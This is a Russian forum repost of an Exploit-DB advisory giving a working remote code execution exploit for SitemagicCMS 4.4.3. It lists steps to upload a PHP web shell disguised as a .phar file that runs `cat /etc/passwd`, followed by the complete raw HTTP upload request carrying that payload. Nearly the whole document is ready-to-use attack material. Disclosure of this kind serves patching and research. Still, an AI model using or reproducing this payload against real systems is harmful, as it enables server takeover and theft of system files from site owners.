- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 51464
- Проверка EDB
-
- Пройдено
- Автор
- MIRABBAS AğALAROV
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-N/A
- Дата публикации
- 2023-05-23
SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Код:
#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. go to content then files
2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?>
3. go to http://localhost/SitemagicCMS/files/images/shell.phar
payload: <?php echo system("cat /etc/passwd"); ?>
Poc request :
POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream
<?php echo system('cat /etc/passwd'); ?>
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"
60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
- Источник
- www.exploit-db.com